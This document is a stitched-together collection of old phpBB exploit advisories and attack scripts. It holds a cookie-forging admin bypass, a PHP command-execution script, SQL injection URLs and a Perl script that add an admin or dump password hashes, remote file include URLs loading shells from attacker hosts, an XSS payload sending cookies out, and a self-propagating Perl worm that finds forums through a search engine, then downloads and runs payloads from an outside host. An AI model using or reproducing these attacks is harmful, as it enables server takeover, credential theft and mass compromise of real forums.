phpBB

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

PhpBB Xs 2 profile.php Permanent Xss Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#Found By Seph1roth    

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[POST METHOD]

Corrupted page: profile.php?mode=editprofile&cpl_mode=profile_info

Bugged Variable: "selfdes" (Campo "Altre informazioni")

Xss: </textarea>[XSS STRING]

--------------------------------------------------------------------
Written by pureone@spywire.net
--------------------------------------------------------------------
--------------------------------------------------------------------
Exploit : 2.0.x >= phpbb 2.0.12 :
--------------------------------------------------------------------
Lets get on with the show shall we?
your need firefox which is found > http://www.mozilla.org/
your also need the HTTP live headers plug in found > 
http://livehttpheaders.mozdev.org/
ok once installed find your self a phpbb forum i suggest you install one 
localy
you may need http://www.apachefriends.org/en/xampp.html
&  http://prdownloads.sourceforge.net/phpbb/phpBB-2.0.12.zip?download

ok once installed open your browser at http://127.0.0.1
open HTTP live headers which is found in tools.

look for the packet that says

GET /phpbb2/index.php HTTP/1.1
Host : localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) 
Gecko/20041107 Firefox/1.0
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 

Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D

click replay
On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

then once again click replay.
now you should beable to see the admin control panel.
and you will be logged in as the admin.
exploited!
--------------------------------------------------------------------
Solution :
-------------------------------------------------------------------
update to phpbb 2.0.13 or what ever version is out
at the present time of reading this.

or

open> includes/sessions.php
find
if( $sessiondata['autologinid'] == $auto_login_key )

replace with
if( $sessiondata['autologinid'] === $auto_login_key )

------------------------------------------------------------------------

/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #08 - 29/02/05
--------------------------------------------------------
Program: phpBB 2.0.13
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.13 & Lower versions
Risk: Low Risk
Impact: bbcode, smilies, and html not bad filtered en usercp_register.php

phpBB 2.0.13 Bad filtered in usercp_register.php
---------------------------------------------------------

- Description
---------------------------------------------------------
phpBB is an Open Source project that is developed of a big comunnity of programmers. It has suport for a lot of databases, like Oracle, MSSQL, MySql, PostGres, etc, and is one of the more useds precompilateds packages.

- Tested
---------------------------------------------------------
I tested this bug in localhost and other forums

- Explotation
---------------------------------------------------------
The bad code is in the usercp_register.php file. The next part of the code is the vulnerable:

$allowhtml = ( isset($HTTP_POST_VARS['allowhtml']) ) ? ( ($HTTP_POST_VARS['allowhtml']) ? TRUE : 0 ) : $board_config['allow_html'];
$allowbbcode = ( isset($HTTP_POST_VARS['allowbbcode']) ) ? ( ($HTTP_POST_VARS['allowbbcode']) ? TRUE : 0 ) : $board_config['allow_bbcode'];
$allowsmilies = ( isset($HTTP_POST_VARS['allowsmilies']) ) ? ( ($HTTP_POST_VARS['allowsmilies']) ? TRUE : 0 ) : $board_config['allow_smilies'];

If we specify a variable in the html code (any type: hidden, text, radio, check, etc) with the name allowhtml, allowbbcode or
allowsmilies, is going to be on the html, bbcode and smilies in our signature. But this only works for private messages.

In the topics our signature is going to be filtered, but no in the private messages.

- Exploit
---------------------------------------------------------
1 - Copy the html code of the registration page of the vulnerable forum.

2 - Change the form action to the path of the forum and profile.php. Example: http://phpbb.com/phpBB2/profile.php

3 - Add the variable for to enable the bbode, htmlcode or smilies (if they're not) in your private messages. Example:





4 - With your html registration page (modified) you have to register any user with some html code in the signature for test
this bug.

- Solutions
--------------------------------------------------------
At this date there is not any update, but we can change the code of the file usercp_register.php

Vulnerable:

$allowhtml = ( isset($HTTP_POST_VARS['allowhtml']) ) ? ( ($HTTP_POST_VARS['allowhtml']) ? TRUE : 0 ) : $board_config['allow_html'];
$allowbbcode = ( isset($HTTP_POST_VARS['allowbbcode']) ) ? ( ($HTTP_POST_VARS['allowbbcode']) ? TRUE : 0 ) : $board_config['allow_bbcode'];
$allowsmilies = ( isset($HTTP_POST_VARS['allowsmilies']) ) ? ( ($HTTP_POST_VARS['allowsmilies']) ? TRUE : 0 ) : $board_config['allow_smilies'];

Fixed:

$allowhtml = ( $board_config['allowhtml']) ) ? TRUE : 0;
$allowbbcode = ( $board_config['allowbbcode']) ) ? TRUE : 0;
$allowsmilies = ( $board_config['allowsmilies']) ) ? TRUE : 0;



- References
--------------------------------------------------------
http://neosecurityteam.tk/index.php?pagina=advisories&id=8


- Credits
-------------------------------------------------
Discovered by Paisterist

[N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.tk/

Any Question? paisterist.nst[at]gmail[dot]com

Irc.InfoGroup.cl #neosecurityteam

- Greetz
--------------------------------------------------------
Hackzatan
T0wn3r
Crashcool
Daemon21
Merlin
Maxx
Arcanhell

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/

#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
#    PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if ($argv[2]){
    $url = $argv[1];
    $command = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
    echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
    exit;
}
if ($argv[3])
    $topic = $argv[3];
else
    $topic = 1;

if ($argv[4])
    $proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&amp;highlight=%2527%252esystem(".$cmd." )%252e%2527";       
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

    for($i = 0;$i < strlen($str);$i++){
        $chr .= "chr(".ord($str{$i}).")";
        if ($i != strlen($str) -1)
             $chr .= "%252e";    
    }
    return $chr;
}
?>

Phpbb: All vulnerable all except 2.0.11
Attachment module: All version vulnerable 

Howdark update opened wide my eyes with his nice exploit: 

Bugtraq id: 10701 

 -----
viewtopic.php?t=1&highlight=%2527
 ----- 

Looking at the code I saw that was possible inject any type of Sql query 
with a multiple char() functions. 

The following code can add an username with admin rights executing this 
query: 

INSERT INTO 
phpbb_users(user_id,user_active,username,user_password,user_level) VALUES 
('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1') 

And will be added to phpbb_users a new user with admin rights. 

*Note we can only execute a working query if we know the tables name. If not 
we can't. So this work only with a standard installation (usually 95% of 
websites ;-) 

username: ze3lock
pass: thepass 

The exploit can be run without being logged in and then you can have access 
with username. So it's quite simple to make it part of a script that could 
make backdoors around the web. 

For make it working just use the id of a working thread (in this case the 
thread is 30 - you can see it from the message) 

 --- Code start ---- 

http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr 
(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32) 
%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25 
2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252 
echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25 
2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2 
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2 
52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2 
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)% 
252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)% 
252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)% 
252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44) 
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108 
)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32 
)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%25 
2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech 
r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39 
)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108) 
%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2 
52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec 
hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr 
(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98 
)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%25 
2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec 
hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr( 
41))%252e%2527 

 --- code end --- 

 ------------ Attach Module ---------------- 


In the attach module, I found a directory traversal in the "UPLOAD_DIR" 
field. 

This is the directory where all attachments are supposted to be uploaded. 

The field accept any kind of character so you can put instead of 'files' 
'../../' and all the attachments will be uploaded in the '../..? directory. 

That's really dangerous for defacements threat. 


 --------------- Suggestion ------------------ 

Please, upgrade to version 2.0.11 and add an input validation to UPLOAD_DIR 
field in attach module. 

Zeelock 

$ BiyoSecurity.Org & SecurityWall.Org

$ Script Name : Phpbb insert module

$ versions : 0.1.0 and 0.1.1

$ Risk : High

$ Regard : KorsaN

$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra

$ Vulnerable File : functions_mod_user.php

$ Vulnerable code : 

<-- code start -->


include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);


$ Exploit : 

www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&amp;cmd=ls

-----------------------------------------------

Phpbb Tweaked (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz - xoron.info

-----------------------------------------------

Code:
include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

-----------------------------------------------

POC:

www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

Exploit:

www.xoron.info/bugs/phpbbtweaked.txt

-----------------------------------------------

download: http://sourceforge.net/projects/phpbbtweaked/

-----------------------------------------------

Tesekkurler: pang0, chaos, can bjorn
Thanx: str0ke, kacper
 
-----------------------------------------------

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir cocuk xoron.

Adimizi altin harflerle yazdik.

-----------------------------------------------

# milw0rm.com [2007-01-31]

********************************************************************
*Title:
*phpBB2 Remote File Include
*
*
*Credit:
*Canberx
*
*
*Thanx:
*Forewer-Partizan
*
*
*Mail:
*canberx@linuxmail.org    www.canberx.tk
*
*
*Google Dork:
*Powered by phpBB © 2001, 2002 phpBB Group
*
*
*Exploit:
*www.target.com/[path_to_phpbb]/template.php?page=[attacker]
*
*
*********************************************************************

Plz Don't Hacked site if it already has been defaced :)

*********************************************************************

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

phpBB User Viewed Posts Tracker Version <= 1.0 [phpbb_root_path] File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL: http://www.nivisec.com/downloads/phpbb/user_viewed_posts.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vuln. Code: include_once($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_user_viewed_posts.' . $phpEx);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:
/includes/functions_user_viewed_posts.php?phpbb_root_path=http://SH3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2006-10-06]

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
phpBB 2.0.23 Session Hijacking Vulnerability                +
found by NBBN                 13 Mar 2008                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++                  



::Information about this vulnerabilty
If a moderator or an admin close a thread in phpBB 2.0.X, the sessionid 
is sending with GET:

http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=[session]

The admin/moderator are going to be redirected to the thread(with the 
session). If an attacker has posted an image in his post, he can see the 
referer and so the session id. And if the attacker have a good day and 
the admin close the thread, he can use all admin-functions with csrf.


::Fix

No fix

::Workaround

Upgrade to phpBB3

::Tested under:

phpBB 2.0.23 (localhost)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source 
bulletin board package. phpBB has a user-friendly interface, simple and 
straightforward administration panel, and helpful FAQ. Based on the powerful 
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or 
Access/ODBC database servers, phpBB is the ideal free community solution for 
all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile 
"Always allow HTML: YES" or are you Guest

that you can use this tags:

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>

Exploit:

<B C=">" 
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" 
X="<B "> H A L O </B>

and have you cookies.

- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is

- -25-31---
if( !empty($setmodules) )
{
  $filename = basename(__FILE__);
  $module['Users']['Disallow'] = append_sid($filename);

  return;
}
- -25-31---

function append_sid() dosen't exists. And if you have:

register_globals = On
display_errors = On

Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() 
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---

- --- 3. Greets ---
sp3x

- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----

#/usr/bin/perl

################################################################################
#  ------------------------------------------------------------------------    #
#  Severino Honorato - /server irc.priv8crew.info #Priv8crew - ssh.D.Worm      #
#                                                                              #
################################################################################


use IO::Socket;
use LWP::Simple;
my $processo = "/usr/local/apache/bin/httpd -DSSL";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

while(1){
@vul = "";
$a=0;
$numero = int rand(999);
$procura = "topic.php?t=$numero";

######################################
for($n=0;$n<1111;$n += 10){

  @cade = get("http://www.altavista.com/web/results?itag=wrx&amp;q=$procura&amp;kgs=1&amp;kls=0&amp;stq=$n") or next;
  $ae = "@cade";
  #print $ae;
  while ($ae=~ m/<a class=\'res\' href=\'.*?\'>/){
    $ae=~ s/<a class=\'res\' href=\'(.*?)\'>/$1/;
    $uber=$1;

    $uber =~ s/ //g;
    $uber =~ s/<b>//g;
    $uber =~ s/<\/b>//g;
    $uber =~ s/<wbr>//g;

    if ($uber =~/&amp;/){
      $nu = index $uber, '&amp;';
      $uber = substr($uber,0,$nu);
    }
    $vul[$a] = $uber;
    $a++
  }
}

#########################


$cmd = "&amp;rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd /tmp;wget 
atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl 
sess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl 
sess_189f0f0889555397a4de5485dd611111;rm 
sess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&amp;highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';";

$b = scalar(@vul);

for($a=0;$a<=$b;$a++)
{
$sitevul = $vul[$a] . $cmd;
if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }

$teste1 = get($sitevul) or next;
$teste1 = "";
}
}

-----------------------------------------------

phpBB2 MODificat (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:
include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );
-----------------------------------------------

POC:

www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=110366

-----------------------------------------------

Tesekkurler: pang0, chaos, can bjorn

Thanx: str0ke, kacper

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir cocuk xoron.

Adimizi altin harflerle yazdik.

-----------------------------------------------

heres a update of the paper:

phpBB 2.0.13 <= downloads.php Mod SQL injection

[ www.batznet.com ]

##############################################

Discussion:
--------------------
This exploit makes it possible to insert SQL Code through downloads.php


Bug:
--------------------
http://www.phpbb.de/downloads.php?cat=batz

Spits out an error msg:

Could not query downloads

DEBUG MODE

SQL Error : 1054 Unknown column 'leet' in 'where clause'

SELECT * FROM phpbb2_downloads where cat=leet ORDER by sort

Line : 106
File : downloads.php



Exploit:
--------------------
/downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FRO
M%20phpbb_users%20WHERE%20user_id=2/*

This gives the MD5 hash from UID 2!


Patch:
-------------------
Dont use this Mod. :)


Greetz:
-------------------
Greetz fly out to R_Q, darkkilla, Madinfect, EaTh, kr3mliyn


// written by [R]
// 02.04.2005

#!/usr/bin/perl -w
use IO::Socket;

##    Example:
##    C:\>cal_phpbb.pl www.site.com /phpBB2/ 2
##
##    'Calendar Pro' Mod for phpBB
##    *************************
##      [~] Connecting...
##      [+] Connected!
##      [~] Sending Data...
##      [~] Data Sent, Waiting for response...
##      [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " 'Calendar Pro' Mod <= 2.0.33 (Newest version) For phpBB\n";
print " Bug found by Axl\n";
print " Coded by CereBrums // 4/4/2005\n";
print " Usage: cal_phpbb.pl <server> <folder> <user_id>\n";
print " e.g.: cal_phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 is default for phpBB admin) \n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}

$take = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n 'Calendar Pro' Mod for phpBB\n";
print " *****************************\n";
print "  [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";

print "  [+] Connected!\n";
print "  [~] Sending Data...\n";

$path = "http://$server/";
$path .= "/$folder/";
$path .= "cal_view_month.php?month=04&amp;year=2005&amp;category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";

print "  [~] Data Sent, Waiting for response...\n";

while ($answer = <$socket>)
{
       if ($take == 1) {
               $in = rindex ($answer, "(");
               if ( $in > -1 ) {
                       $pass = substr($answer,$in+1,32);
                       print "  [+] MD5 Hash for user with id=$user_id is: $pass\n";
                       exit();
               }
       }
       if ( rindex ($answer,"cal_view_month.php?month=3&amp;year=2005") > -1 ) {
               $take = 1;
       }
}
print "  [-] Exploit failed\n";